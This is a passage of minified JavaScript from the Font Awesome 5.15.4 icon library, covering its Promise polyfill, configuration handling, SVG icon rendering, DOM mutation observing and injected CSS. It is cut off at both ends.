i}}return e}(t,n)||function(){throw new TypeError("Invalid attempt to destructure non-iterable instance")}()}t.g=function(){if("object"==typeof globalThis)return globalThis;try{return this||new Function("return this")()}catch(t){if("object"==typeof window)return window}}();var o=function(){},c={},s={},f=null,l={mark:o,measure:o};try{"undefined"!=typeof window&&(c=window),"undefined"!=typeof document&&(s=document),"undefined"!=typeof MutationObserver&&(f=MutationObserver),"undefined"!=typeof performance&&(l=performance)}catch(t){}var u=(c.navigator||{}).userAgent,m=void 0===u?"":u,d=c,p=s,h=f,g=l,v=(d.document,!!p.documentElement&&!!p.head&&"function"==typeof p.addEventListener&&"function"==typeof p.createElement),b=~m.indexOf("MSIE")||~m.indexOf("Trident/"),y="svg-inline--fa",w="data-fa-i2svg",x="data-fa-pseudo-element",k="fontawesome-i2svg",_=["HTML","HEAD","STYLE","SCRIPT"],A=function(){try{return!0}catch(t){return!1}}(),M={fas:"solid",far:"regular",fal:"light",fad:"duotone",fab:"brands",fak:"kit",fa:"solid"},O={solid:"fas",regular:"far",light:"fal",duotone:"fad",brands:"fab",kit:"fak"},N="fa-layers-text",C=/Font Awesome ([5 ]*)(Solid|Regular|Light|Duotone|Brands|Free|Pro|Kit).*/i,E={900:"fas",400:"far",normal:"far",300:"fal"},S=[1,2,3,4,5,6,7,8,9,10],z=S.concat([11,12,13,14,15,16,17,18,19,20]),P=["class","data-prefix","data-icon","data-fa-transform","data-fa-mask"],T={GROUP:"group",SWAP_OPACITY:"swap-opacity",PRIMARY:"primary",SECONDARY:"secondary"},I=["xs","sm","lg","fw","ul","li","border","pull-left","pull-right","spin","pulse","rotate-90","rotate-180","rotate-270","flip-horizontal","flip-vertical","flip-both","stack","stack-1x","stack-2x","inverse","layers","layers-text","layers-counter",T.GROUP,T.SWAP_OPACITY,T.PRIMARY,T.SECONDARY].concat(S.map((function(t){return"".concat(t,"x")}))).concat(z.map((function(t){return"w-".concat(t)}))),j=d.FontAwesomeConfig||{};p&&"function"==typeof p.querySelector&&[["data-family-prefix","familyPrefix"],["data-replacement-class","replacementClass"],["data-auto-replace-svg","autoReplaceSvg"],["data-auto-add-css","autoAddCss"],["data-auto-a11y","autoA11y"],["data-search-pseudo-elements","searchPseudoElements"],["data-observe-mutations","observeMutations"],["data-mutate-approach","mutateApproach"],["data-keep-original-source","keepOriginalSource"],["data-measure-performance","measurePerformance"],["data-show-missing-icons","showMissingIcons"]].forEach((function(t){var n=i(t,2),e=n[0],a=n[1],r=function(t){return""===t||"false"!==t&&("true"===t||t)}(function(t){var n=p.querySelector("script["+t+"]");if(n)return n.getAttribute(t)}(e));null!=r&&(j[a]=r)}));var L=r({},{familyPrefix:"fa",replacementClass:y,autoReplaceSvg:!0,autoAddCss:!0,autoA11y:!0,searchPseudoElements:!1,observeMutations:!0,mutateApproach:"async",keepOriginalSource:!0,measurePerformance:!1,showMissingIcons:!0},j);L.autoReplaceSvg||(L.observeMutations=!1);var R=r({},L);d.FontAwesomeConfig=R;var F=d||{};F.___FONT_AWESOME___||(F.___FONT_AWESOME___={}),F.___FONT_AWESOME___.styles||(F.___FONT_AWESOME___.styles={}),F.___FONT_AWESOME___.hooks||(F.___FONT_AWESOME___.hooks={}),F.___FONT_AWESOME___.shims||(F.___FONT_AWESOME___.shims=[]);var H=F.___FONT_AWESOME___,D=[],Y=!1;function V(t){v&&(Y?setTimeout(t,0):D.push(t))}v&&((Y=(p.documentElement.doScroll?/^loaded|^c/:/^loaded|^i|^c/).test(p.readyState))||p.addEventListener("DOMContentLoaded",(function t(){p.removeEventListener("DOMContentLoaded",t),Y=1,D.map((function(t){return t()}))})));var W,X="pending",B="settled",U="fulfilled",q="rejected",G=function(){},K=void 0!==t.g&&void 0!==t.g.process&&"function"==typeof t.g.process.emit,J="undefined"==typeof setImmediate?setTimeout:setImmediate,Q=[];function Z(){for(var t=0;t<Q.length;t++)Q[t][0](Q[t][1]);Q=[],W=!1}function $(t,n){Q.push([t,n]),W||(W=!0,J(Z,0))}function tt(t){var n=t.owner,e=n._state,a=n._data,r=t[e],i=t.then;if("function"==typeof r){e=U;try{a=r(a)}catch(t){rt(i,t)}}nt(i,a)||(e===U&&et(i,a),e===q&&rt(i,a))}function nt(t,e){var a;try{if(t===e)throw new TypeError("A promises callback cannot return that same promise.");if(e&&("function"==typeof e||"object"===n(e))){var r=e.then;if("function"==typeof r)return r.call(e,(function(n){a||(a=!0,e===n?at(t,n):et(t,n))}),(function(n){a||(a=!0,rt(t,n))})),!0}}catch(n){return a||rt(t,n),!0}return!1}function et(t,n){t!==n&&nt(t,n)||at(t,n)}function at(t,n){t._state===X&&(t._state=B,t._data=n,$(ot,t))}function rt(t,n){t._state===X&&(t._state=B,t._data=n,$(ct,t))}function it(t){t._then=t._then.forEach(tt)}function ot(t){t._state=U,it(t)}function ct(n){n._state=q,it(n),!n._handled&&K&&t.g.process.emit("unhandledRejection",n._data,n)}function st(n){t.g.process.emit("rejectionHandled",n)}function ft(t){if("function"!=typeof t)throw new TypeError("Promise resolver "+t+" is not a function");if(this instanceof ft==0)throw new TypeError("Failed to construct 'Promise': Please use the 'new' operator, this object constructor cannot be called as a function.");this._then=[],function(t,n){function e(t){rt(n,t)}try{t((function(t){et(n,t)}),e)}catch(t){e(t)}}(t,this)}ft.prototype={constructor:ft,_state:X,_then:null,_data:void 0,_handled:!1,then:function(t,n){var e={owner:this,then:new this.constructor(G),fulfilled:t,rejected:n};return!n&&!t||this._handled||(this._handled=!0,this._state===q&&K&&$(st,this)),this._state===U||this._state===q?$(tt,e):this._then.push(e),e.then},catch:function(t){return this.then(null,t)}},ft.all=function(t){if(!Array.isArray(t))throw new TypeError("You must pass an array to Promise.all().");return new ft((function(n,e){var a=[],r=0;function i(t){return r++,function(e){a[t]=e,--r||n(a)}}for(var o,c=0;c<t.length;c++)(o=t[c])&&"function"==typeof o.then?o.then(i(c),e):a[c]=o;r||n(a)}))},ft.race=function(t){if(!Array.isArray(t))throw new TypeError("You must pass an array to Promise.race().");return new ft((function(n,e){for(var a,r=0;r<t.length;r++)(a=t[r])&&"function"==typeof a.then?a.then(n,e):n(a)}))},ft.resolve=function(t){return t&&"object"===n(t)&&t.constructor===ft?t:new ft((function(n){n(t)}))},ft.reject=function(t){return new ft((function(n,e){e(t)}))};var lt="function"==typeof Promise?Promise:ft,ut=16,mt={size:16,x:0,y:0,rotate:0,flipX:!1,flipY:!1};function dt(t){if(t&&v){var n=p.createElement("style");n.setAttribute("type","text/css"),n.innerHTML=t;for(var e=p.head.childNodes,a=null,r=e.length-1;r>-1;r--){var i=e[r],o=(i.tagName||"").toUpperCase();["STYLE","LINK"].indexOf(o)>-1&&(a=i)}return p.head.insertBefore(n,a),t}}function pt(){for(var t=12,n="";t-- >0;)n+="0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ"[62*Math.random()|0];return n}function ht(t){for(var n=[],e=(t||[]).length>>>0;e--;)n[e]=t[e];return n}function gt(t){return t.classList?ht(t.classList):(t.getAttribute("class")||"").split(" ").filter((function(t){return t}))}function vt(t){return"".concat(t).replace(/&/g,"&amp;").replace(/"/g,"&quot;").replace(/'/g,"&#39;").replace(/</g,"&lt;").replace(/>/g,"&gt;")}function bt(t){return Object.keys(t||{}).reduce((function(n,e){return n+"".concat(e,": ").concat(t[e],";")}),"")}function yt(t){return t.size!==mt.size||t.x!==mt.x||t.y!==mt.y||t.rotate!==mt.rotate||t.flipX||t.flipY}function wt(t){var n=t.transform,e=t.containerWidth,a=t.iconWidth,r={transform:"translate(".concat(e/2," 256)")},i="translate(".concat(32*n.x,", ").concat(32*n.y,") "),o="scale(".concat(n.size/16*(n.flipX?-1:1),", ").concat(n.size/16*(n.flipY?-1:1),") "),c="rotate(".concat(n.rotate," 0 0)");return{outer:r,inner:{transform:"".concat(i," ").concat(o," ").concat(c)},path:{transform:"translate(".concat(a/2*-1," -256)")}}}var xt={x:0,y:0,width:"100%",height:"100%"};function kt(t){var n=!(arguments.length>1&&void 0!==arguments[1])||arguments[1];return t.attributes&&(t.attributes.fill||n)&&(t.attributes.fill="black"),t}function _t(t){var n=t.icons,e=n.main,a=n.mask,i=t.prefix,o=t.iconName,c=t.transform,s=t.symbol,f=t.title,l=t.maskId,u=t.titleId,m=t.extra,d=t.watchable,p=void 0!==d&&d,h=a.found?a:e,g=h.width,v=h.height,b="fak"===i,y=b?"":"fa-w-".concat(Math.ceil(g/v*16)),x=[R.replacementClass,o?"".concat(R.familyPrefix,"-").concat(o):"",y].filter((function(t){return-1===m.classes.indexOf(t)})).filter((function(t){return""!==t||!!t})).concat(m.classes).join(" "),k={children:[],attributes:r({},m.attributes,{"data-prefix":i,"data-icon":o,class:x,role:m.attributes.role||"img",xmlns:"http://www.w3.org/2000/svg",viewBox:"0 0 ".concat(g," ").concat(v)})},_=b&&!~m.classes.indexOf("fa-fw")?{width:"".concat(g/v*16*.0625,"em")}:{};p&&(k.attributes[w]=""),f&&k.children.push({tag:"title",attributes:{id:k.attributes["aria-labelledby"]||"title-".concat(u||pt())},children:[f]});var A=r({},k,{prefix:i,iconName:o,main:e,mask:a,maskId:l,transform:c,symbol:s,styles:r({},_,m.styles)}),M=a.found&&e.found?function(t){var n,e=t.children,a=t.attributes,i=t.main,o=t.mask,c=t.maskId,s=t.transform,f=i.width,l=i.icon,u=o.width,m=o.icon,d=wt({transform:s,containerWidth:u,iconWidth:f}),p={tag:"rect",attributes:r({},xt,{fill:"white"})},h=l.children?{children:l.children.map(kt)}:{},g={tag:"g",attributes:r({},d.inner),children:[kt(r({tag:l.tag,attributes:r({},l.attributes,d.path)},h))]},v={tag:"g",attributes:r({},d.outer),children:[g]},b="mask-".concat(c||pt()),y="clip-".concat(c||pt()),w={tag:"mask",attributes:r({},xt,{id:b,maskUnits:"userSpaceOnUse",maskContentUnits:"userSpaceOnUse"}),children:[p,v]},x={tag:"defs",children:[{tag:"clipPath",attributes:{id:y},children:(n=m,"g"===n.tag?n.children:[n])},w]};return e.push(x,{tag:"rect",attributes:r({fill:"currentColor","clip-path":"url(#".concat(y,")"),mask:"url(#".concat(b,")")},xt)}),{children:e,attributes:a}}(A):function(t){var n=t.children,e=t.attributes,a=t.main,i=t.transform,o=bt(t.styles);if(o.length>0&&(e.style=o),yt(i)){var c=wt({transform:i,containerWidth:a.width,iconWidth:a.width});n.push({tag:"g",attributes:r({},c.outer),children:[{tag:"g",attributes:r({},c.inner),children:[{tag:a.icon.tag,children:a.icon.children,attributes:r({},a.icon.attributes,c.path)}]}]})}else n.push(a.icon);return{children:n,attributes:e}}(A),O=M.children,N=M.attributes;return A.children=O,A.attributes=N,s?function(t){var n=t.prefix,e=t.iconName,a=t.children,i=t.attributes,o=t.symbol;return[{tag:"svg",attributes:{style:"display: none;"},children:[{tag:"symbol",attributes:r({},i,{id:!0===o?"".concat(n,"-").concat(R.familyPrefix,"-").concat(e):o}),children:a}]}]}(A):function(t){var n=t.children,e=t.main,a=t.mask,i=t.attributes,o=t.styles,c=t.transform;if(yt(c)&&e.found&&!a.found){var s={x:e.width/e.height/2,y:.5};i.style=bt(r({},o,{"transform-origin":"".concat(s.x+c.x/16,"em ").concat(s.y+c.y/16,"em")}))}return[{tag:"svg",attributes:i,children:n}]}(A)}function At(t){var n=t.content,e=t.width,a=t.height,i=t.transform,o=t.title,c=t.extra,s=t.watchable,f=void 0!==s&&s,l=r({},c.attributes,o?{title:o}:{},{class:c.classes.join(" ")});f&&(l[w]="");var u=r({},c.styles);yt(i)&&(u.transform=function(t){var n=t.transform,e=t.width,a=void 0===e?16:e,r=t.height,i=void 0===r?16:r,o=t.startCentered,c=void 0!==o&&o,s="";return s+=c&&b?"translate(".concat(n.x/ut-a/2,"em, ").concat(n.y/ut-i/2,"em) "):c?"translate(calc(-50% + ".concat(n.x/ut,"em), calc(-50% + ").concat(n.y/ut,"em)) "):"translate(".concat(n.x/ut,"em, ").concat(n.y/ut,"em) "),(s+="scale(".concat(n.size/ut*(n.flipX?-1:1),", ").concat(n.size/ut*(n.flipY?-1:1),") "))+"rotate(".concat(n.rotate,"deg) ")}({transform:i,startCentered:!0,width:e,height:a}),u["-webkit-transform"]=u.transform);var m=bt(u);m.length>0&&(l.style=m);var d=[];return d.push({tag:"span",attributes:l,children:[n]}),o&&d.push({tag:"span",attributes:{class:"sr-only"},children:[o]}),d}var Mt=function(){},Ot=R.measurePerformance&&g&&g.mark&&g.measure?g:{mark:Mt,measure:Mt},Nt='FA "5.15.4"',Ct=function(t){return Ot.mark("".concat(Nt," ").concat(t," begins")),function(){return function(t){Ot.mark("".concat(Nt," ").concat(t," ends")),Ot.measure("".concat(Nt," ").concat(t),"".concat(Nt," ").concat(t," begins"),"".concat(Nt," ").concat(t," ends"))}(t)}},Et=function(t,n,e,a){var r,i,o,c=Object.keys(t),s=c.length,f=void 0!==a?function(t,n){return function(e,a,r,i){return t.call(n,e,a,r,i)}}(n,a):n;for(void 0===e?(r=1,o=t[c[0]]):(r=0,o=e);r<s;r++)o=f(o,t[i=c[r]],i,t);return o};function St(t){for(var n="",e=0;e<t.length;e++)n+=("000"+t.charCodeAt(e).toString(16)).slice(-4);return n}function zt(t,n){var e=arguments.length>2&&void 0!==arguments[2]?arguments[2]:{},a=e.skipHooks,i=void 0!==a&&a,o=Object.keys(n).reduce((function(t,e){var a=n[e];return a.icon?t[a.iconName]=a.icon:t[e]=a,t}),{});"function"!=typeof H.hooks.addPack||i?H.styles[t]=r({},H.styles[t]||{},o):H.hooks.addPack(t,o),"fas"===t&&zt("fa",n)}var Pt=H.styles,Tt=H.shims,It={},jt={},Lt={},Rt=function(){var t=function(t){return Et(Pt,(function(n,e,a){return n[a]=Et(e,t,{}),n}),{})};It=t((function(t,n,e){return n[3]&&(t[n[3]]=e),t})),jt=t((function(t,n,e){var a=n[2];return t[e]=e,a.forEach((function(n){t[n]=e})),t}));var n="far"in Pt;Lt=Et(Tt,(function(t,e){var a=e[0],r=e[1],i=e[2];return"far"!==r||n||(r="fas"),t[a]={prefix:r,iconName:i},t}),{})};function Ft(t,n){return(It[t]||{})[n]}Rt();var Ht=H.styles;function Dt(t){return t.reduce((function(t,n){var e=function(t,n){var e,a=n.split("-"),r=a[0],i=a.slice(1).join("-");return r!==t||""===i||(e=i,~I.indexOf(e))?null:i}(R.familyPrefix,n);if(Ht[n])t.prefix=n;else if(R.autoFetchSvg&&Object.keys(M).indexOf(n)>-1)t.prefix=n;else if(e){var a="fa"===t.prefix?Lt[e]||{prefix:null,iconName:null}:{};t.iconName=a.iconName||e,t.prefix=a.prefix||t.prefix}else n!==R.replacementClass&&0!==n.indexOf("fa-w-")&&t.rest.push(n);return t}),{prefix:null,iconName:null,rest:[]})}function Yt(t){var n=t.tag,e=t.attributes,a=void 0===e?{}:e,r=t.children,i=void 0===r?[]:r;return"string"==typeof t?vt(t):"<".concat(n," ").concat(function(t){return Object.keys(t||{}).reduce((function(n,e){return n+"".concat(e,'="').concat(vt(t[e]),'" ')}),"").trim()}(a),">").concat(i.map(Yt).join(""),"</").concat(n,">")}var Vt=function(){};function Wt(t){return"string"==typeof(t.getAttribute?t.getAttribute(w):null)}var Xt={replace:function(t){var n=t[0],e=t[1].map((function(t){return Yt(t)})).join("\n");if(n.parentNode&&n.outerHTML)n.outerHTML=e+(R.keepOriginalSource&&"svg"!==n.tagName.toLowerCase()?"\x3c!-- ".concat(n.outerHTML," Font Awesome fontawesome.com --\x3e"):"");else if(n.parentNode){var a=document.createElement("span");n.parentNode.replaceChild(a,n),a.outerHTML=e}},nest:function(t){var n=t[0],e=t[1];if(~gt(n).indexOf(R.replacementClass))return Xt.replace(t);var a=new RegExp("".concat(R.familyPrefix,"-.*"));delete e[0].attributes.style,delete e[0].attributes.id;var r=e[0].attributes.class.split(" ").reduce((function(t,n){return n===R.replacementClass||n.match(a)?t.toSvg.push(n):t.toNode.push(n),t}),{toNode:[],toSvg:[]});e[0].attributes.class=r.toSvg.join(" ");var i=e.map((function(t){return Yt(t)})).join("\n");n.setAttribute("class",r.toNode.join(" ")),n.setAttribute(w,""),n.innerHTML=i}};function Bt(t){t()}function Ut(t,n){var e="function"==typeof n?n:Vt;if(0===t.length)e();else{var a=Bt;"async"===R.mutateApproach&&(a=d.requestAnimationFrame||Bt),a((function(){var n=!0===R.autoReplaceSvg?Xt.replace:Xt[R.autoReplaceSvg]||Xt.replace,a=Ct("mutate");t.map(n),a(),e()}))}}var qt=!1;function Gt(){qt=!1}var Kt=null;function Jt(t){if(h&&R.observeMutations){var n=t.treeCallback,e=t.nodeCallback,a=t.pseudoElementsCallback,r=t.observeMutationsRoot,i=void 0===r?p:r;Kt=new h((function(t){qt||ht(t).forEach((function(t){if("childList"===t.type&&t.addedNodes.length>0&&!Wt(t.addedNodes[0])&&(R.searchPseudoElements&&a(t.target),n(t.target)),"attributes"===t.type&&t.target.parentNode&&R.searchPseudoElements&&a(t.target.parentNode),"attributes"===t.type&&Wt(t.target)&&~P.indexOf(t.attributeName))if("class"===t.attributeName){var r=Dt(gt(t.target)),i=r.prefix,o=r.iconName;i&&t.target.setAttribute("data-prefix",i),o&&t.target.setAttribute("data-icon",o)}else e(t.target)}))})),v&&Kt.observe(i,{childList:!0,attributes:!0,characterData:!0,subtree:!0})}}function Qt(t){var n=function(t){var n,e,a=t.getAttribute("data-prefix"),r=t.getAttribute("data-icon"),i=void 0!==t.innerText?t.innerText.trim():"",o=Dt(gt(t));return a&&r&&(o.prefix=a,o.iconName=r),o.prefix&&i.length>1?o.iconName=(n=o.prefix,e=t.innerText,(jt[n]||{})[e]):o.prefix&&1===i.length&&(o.iconName=Ft(o.prefix,St(t.innerText))),o}(t),e=n.iconName,a=n.prefix,r=n.rest,i=function(t){var n=t.getAttribute("style"),e=[];return n&&(e=n.split(";").reduce((function(t,n){var e=n.split(":"),a=e[0],r=e.slice(1);return a&&r.length>0&&(t[a]=r.join(":").trim()),t}),{})),e}(t),o=function(t){return function(t){var n={size:16,x:0,y:0,flipX:!1,flipY:!1,rotate:0};return t?t.toLowerCase().split(" ").reduce((function(t,n){var e=n.toLowerCase().split("-"),a=e[0],r=e.slice(1).join("-");if(a&&"h"===r)return t.flipX=!0,t;if(a&&"v"===r)return t.flipY=!0,t;if(r=parseFloat(r),isNaN(r))return t;switch(a){case"grow":t.size=t.size+r;break;case"shrink":t.size=t.size-r;break;case"left":t.x=t.x-r;break;case"right":t.x=t.x+r;break;case"up":t.y=t.y-r;break;case"down":t.y=t.y+r;break;case"rotate":t.rotate=t.rotate+r}return t}),n):n}(t.getAttribute("data-fa-transform"))}(t),c=function(t){var n=t.getAttribute("data-fa-symbol");return null!==n&&(""===n||n)}(t),s=function(t){var n=ht(t.attributes).reduce((function(t,n){return"class"!==t.name&&"style"!==t.name&&(t[n.name]=n.value),t}),{}),e=t.getAttribute("title"),a=t.getAttribute("data-fa-title-id");return R.autoA11y&&(e?n["aria-labelledby"]="".concat(R.replacementClass,"-title-").concat(a||pt()):(n["aria-hidden"]="true",n.focusable="false")),n}(t),f=function(t){var n=t.getAttribute("data-fa-mask");return n?Dt(n.split(" ").map((function(t){return t.trim()}))):{prefix:null,iconName:null,rest:[]}}(t);return{iconName:e,title:t.getAttribute("title"),titleId:t.getAttribute("data-fa-title-id"),prefix:a,transform:o,symbol:c,mask:f,maskId:t.getAttribute("data-fa-mask-id"),extra:{classes:r,styles:i,attributes:s}}}function Zt(t){this.name="MissingIcon",this.message=t||"Icon unavailable",this.stack=(new Error).stack}Zt.prototype=Object.create(Error.prototype),Zt.prototype.constructor=Zt;var $t={fill:"currentColor"},tn={attributeType:"XML",repeatCount:"indefinite",dur:"2s"},nn={tag:"path",attributes:r({},$t,{d:"M156.5,447.7l-12.6,29.5c-18.7-9.5-35.9-21.2-51.5-34.9l22.7-22.7C127.6,430.5,141.5,440,156.5,447.7z M40.6,272H8.5 c1.4,21.2,5.4,41.7,11.7,61.1L50,321.2C45.1,305.5,41.8,289,40.6,272z M40.6,240c1.4-18.8,5.2-37,11.1-54.1l-29.5-12.6 C14.7,194.3,10,216.7,8.5,240H40.6z M64.3,156.5c7.8-14.9,17.2-28.8,28.1-41.5L69.7,92.3c-13.7,15.6-25.5,32.8-34.9,51.5 L64.3,156.5z M397,419.6c-13.9,12-29.4,22.3-46.1,30.4l11.9,29.8c20.7-9.9,39.8-22.6,56.9-37.6L397,419.6z M115,92.4 c13.9-12,29.4-22.3,46.1-30.4l-11.9-29.8c-20.7,9.9-39.8,22.6-56.8,37.6L115,92.4z M447.7,355.5c-7.8,14.9-17.2,28.8-28.1,41.5 l22.7,22.7c13.7-15.6,25.5-32.9,34.9-51.5L447.7,355.5z M471.4,272c-1.4,18.8-5.2,37-11.1,54.1l29.5,12.6 c7.5-21.1,12.2-43.5,13.6-66.8H471.4z M321.2,462c-15.7,5-32.2,8.2-49.2,9.4v32.1c21.2-1.4,41.7-5.4,61.1-11.7L321.2,462z M240,471.4c-18.8-1.4-37-5.2-54.1-11.1l-12.6,29.5c21.1,7.5,43.5,12.2,66.8,13.6V471.4z M462,190.8c5,15.7,8.2,32.2,9.4,49.2h32.1 c-1.4-21.2-5.4-41.7-11.7-61.1L462,190.8z M92.4,397c-12-13.9-22.3-29.4-30.4-46.1l-29.8,11.9c9.9,20.7,22.6,39.8,37.6,56.9 L92.4,397z M272,40.6c18.8,1.4,36.9,5.2,54.1,11.1l12.6-29.5C317.7,14.7,295.3,10,272,8.5V40.6z M190.8,50 c15.7-5,32.2-8.2,49.2-9.4V8.5c-21.2,1.4-41.7,5.4-61.1,11.7L190.8,50z M442.3,92.3L419.6,115c12,13.9,22.3,29.4,30.5,46.1 l29.8-11.9C470,128.5,457.3,109.4,442.3,92.3z M397,92.4l22.7-22.7c-15.6-13.7-32.8-25.5-51.5-34.9l-12.6,29.5 C370.4,72.1,384.4,81.5,397,92.4z"})},en=r({},tn,{attributeName:"opacity"}),an={tag:"g",children:[nn,{tag:"circle",attributes:r({},$t,{cx:"256",cy:"364",r:"28"}),children:[{tag:"animate",attributes:r({},tn,{attributeName:"r",values:"28;14;28;28;14;28;"})},{tag:"animate",attributes:r({},en,{values:"1;0;1;1;0;1;"})}]},{tag:"path",attributes:r({},$t,{opacity:"1",d:"M263.7,312h-16c-6.6,0-12-5.4-12-12c0-71,77.4-63.9,77.4-107.8c0-20-17.8-40.2-57.4-40.2c-29.1,0-44.3,9.6-59.2,28.7 c-3.9,5-11.1,6-16.2,2.4l-13.1-9.2c-5.6-3.9-6.9-11.8-2.6-17.2c21.2-27.2,46.4-44.7,91.2-44.7c52.3,0,97.4,29.8,97.4,80.2 c0,67.6-77.4,63.5-77.4,107.8C275.7,306.6,270.3,312,263.7,312z"}),children:[{tag:"animate",attributes:r({},en,{values:"1;0;0;0;0;1;"})}]},{tag:"path",attributes:r({},$t,{opacity:"0",d:"M232.5,134.5l7,168c0.3,6.4,5.6,11.5,12,11.5h9c6.4,0,11.7-5.1,12-11.5l7-168c0.3-6.8-5.2-12.5-12-12.5h-23 C237.7,122,232.2,127.7,232.5,134.5z"}),children:[{tag:"animate",attributes:r({},en,{values:"0;0;1;1;0;0;"})}]}]},rn=H.styles;function on(t){var n=t[0],e=t[1],a=i(t.slice(4),1)[0];return{found:!0,width:n,height:e,icon:Array.isArray(a)?{tag:"g",attributes:{class:"".concat(R.familyPrefix,"-").concat(T.GROUP)},children:[{tag:"path",attributes:{class:"".concat(R.familyPrefix,"-").concat(T.SECONDARY),fill:"currentColor",d:a[0]}},{tag:"path",attributes:{class:"".concat(R.familyPrefix,"-").concat(T.PRIMARY),fill:"currentColor",d:a[1]}}]}:{tag:"path",attributes:{fill:"currentColor",d:a}}}}function cn(t,n){return new lt((function(e,a){var r={found:!1,width:512,height:512,icon:an};if(t&&n&&rn[n]&&rn[n][t])return e(on(rn[n][t]));t&&n&&!R.showMissingIcons?a(new Zt("Icon is missing for prefix ".concat(n," with icon name ").concat(t))):e(r)}))}var sn=H.styles;function fn(t){var n=Qt(t);return~n.extra.classes.indexOf(N)?function(t,n){var e=n.title,a=n.transform,r=n.extra,i=null,o=null;if(b){var c=parseInt(getComputedStyle(t).fontSize,10),s=t.getBoundingClientRect();i=s.width/c,o=s.height/c}return R.autoA11y&&!e&&(r.attributes["aria-hidden"]="true"),lt.resolve([t,At({content:t.innerHTML,width:i,height:o,transform:a,title:e,extra:r,watchable:!0})])}(t,n):function(t,n){var e=n.iconName,a=n.title,r=n.titleId,o=n.prefix,c=n.transform,s=n.symbol,f=n.mask,l=n.maskId,u=n.extra;return new lt((function(n,m){lt.all([cn(e,o),cn(f.iconName,f.prefix)]).then((function(f){var m=i(f,2),d=m[0],p=m[1];n([t,_t({icons:{main:d,mask:p},prefix:o,iconName:e,transform:c,symbol:s,mask:p,maskId:l,title:a,titleId:r,extra:u,watchable:!0})])}))}))}(t,n)}function ln(t){var n=arguments.length>1&&void 0!==arguments[1]?arguments[1]:null;if(v){var e=p.documentElement.classList,a=function(t){return e.add("".concat(k,"-").concat(t))},r=function(t){return e.remove("".concat(k,"-").concat(t))},i=R.autoFetchSvg?Object.keys(M):Object.keys(sn),o=[".".concat(N,":not([").concat(w,"])")].concat(i.map((function(t){return".".concat(t,":not([").concat(w,"])")}))).join(", ");if(0!==o.length){var c=[];try{c=ht(t.querySelectorAll(o))}catch(t){}if(c.length>0){a("pending"),r("complete");var s=Ct("onTree"),f=c.reduce((function(t,n){try{var e=fn(n);e&&t.push(e)}catch(t){A||t instanceof Zt&&console.error(t)}return t}),[]);return new lt((function(t,e){lt.all(f).then((function(e){Ut(e,(function(){a("active"),a("complete"),r("pending"),"function"==typeof n&&n(),s(),t()}))})).catch((function(){s(),e()}))}))}}}}function un(t){var n=arguments.length>1&&void 0!==arguments[1]?arguments[1]:null;fn(t).then((function(t){t&&Ut([t],n)}))}function mn(t,n){var e="".concat("data-fa-pseudo-element-pending").concat(n.replace(":","-"));return new lt((function(a,i){if(null!==t.getAttribute(e))return a();var o=ht(t.children).filter((function(t){return t.getAttribute(x)===n}))[0],c=d.getComputedStyle(t,n),s=c.getPropertyValue("font-family").match(C),f=c.getPropertyValue("font-weight"),l=c.getPropertyValue("content");if(o&&!s)return t.removeChild(o),a();if(s&&"none"!==l&&""!==l){var u=c.getPropertyValue("content"),m=~["Solid","Regular","Light","Duotone","Brands","Kit"].indexOf(s[2])?O[s[2].toLowerCase()]:E[f],h=St(3===u.length?u.substr(1,1):u),g=Ft(m,h),v=g;if(!g||o&&o.getAttribute("data-prefix")===m&&o.getAttribute("data-icon")===v)a();else{t.setAttribute(e,v),o&&t.removeChild(o);var b={iconName:null,title:null,titleId:null,prefix:null,transform:mt,symbol:!1,mask:null,maskId:null,extra:{classes:[],styles:{},attributes:{}}},y=b.extra;y.attributes[x]=n,cn(g,m).then((function(i){var o=_t(r({},b,{icons:{main:i,mask:{prefix:null,iconName:null,rest:[]}},prefix:m,iconName:v,extra:y,watchable:!0})),c=p.createElement("svg");":before"===n?t.insertBefore(c,t.firstChild):t.appendChild(c),c.outerHTML=o.map((function(t){return Yt(t)})).join("\n"),t.removeAttribute(e),a()})).catch(i)}}else a()}))}function dn(t){return lt.all([mn(t,":before"),mn(t,":after")])}function pn(t){return!(t.parentNode===document.head||~_.indexOf(t.tagName.toUpperCase())||t.getAttribute(x)||t.parentNode&&"svg"===t.parentNode.tagName)}function hn(t){if(v)return new lt((function(n,e){var a=ht(t.querySelectorAll("*")).filter(pn).map(dn),r=Ct("searchPseudoElements");qt=!0,lt.all(a).then((function(){r(),Gt(),n()})).catch((function(){r(),Gt(),e()}))}))}function gn(){var t="fa",n=y,e=R.familyPrefix,a=R.replacementClass,r='svg:not(:root).svg-inline--fa {\n  overflow: visible;\n}\n\n.svg-inline--fa {\n  display: inline-block;\n  font-size: inherit;\n  height: 1em;\n  overflow: visible;\n  vertical-align: -0.125em;\n}\n.svg-inline--fa.fa-lg {\n  vertical-align: -0.225em;\n}\n.svg-inline--fa.fa-w-1 {\n  width: 0.0625em;\n}\n.svg-inline--fa.fa-w-2 {\n  width: 0.125em;\n}\n.svg-inline--fa.fa-w-3 {\n  width: 0.1875em;\n}\n.svg-inline--fa.fa-w-4 {\n  width: 0.25em;\n}\n.svg-inline--fa.fa-w-5 {\n  width: 0.3125em;\n}\n.svg-inline--fa.fa-w-6 {\n  width: 0.375em;\n}\n.svg-inline--fa.fa-w-7 {\n  width: 0.4375em;\n}\n.svg-inline--fa.fa-w-8 {\n  width: 0.5em;\n}\n.svg-inline--fa.fa-w-9 {\n  width: 0.5625em;\n}\n.svg-inline--fa.fa-w-10 {\n  width: 0.625em;\n}\n.svg-inline--fa.fa-w-11 {\n  width: 0.6875em;\n}\n.svg-inline--fa.fa-w-12 {\n  width: 0.75em;\n}\n.svg-inline--fa.fa-w-13 {\n  width: 0.8125em;\n}\n.svg-inline--fa.fa-w-14 {\n  width: 0.875em;\n}\n.svg-inline--fa.fa-w-15 {\n  width: 0.9375em;\n}\n.svg-inline--fa.fa-w-16 {\n  width: 1em;\n}\n.svg-inline--fa.fa-w-17 {\n  width: 1.0625em;\n}\n.svg-inline--fa.fa-w-18 {\n  width: 1.125em;\n}\n.svg-inline--fa.fa-w-19 {\n  width: 1.1875em;\n}\n.svg-inline--fa.fa-w-20 {\n  width: 1.25em;\n}\n.svg-inline--fa.fa-pull-left {\n  margin-right: 0.3em;\n  width: auto;\n}\n.svg-inline--fa.fa-pull-right {\n  margin-left: 0.3em;\n  width: auto;\n}\n.svg-inline--fa.fa-border {\n  height: 1.5em;\n}\n.svg-inline--fa.fa-li {\n  width: 2em;\n}\n.svg-inline--fa.fa-fw {\n  width: 1.25em;\n}\n\n.fa-layers svg.svg-inline--fa {\n  bottom: 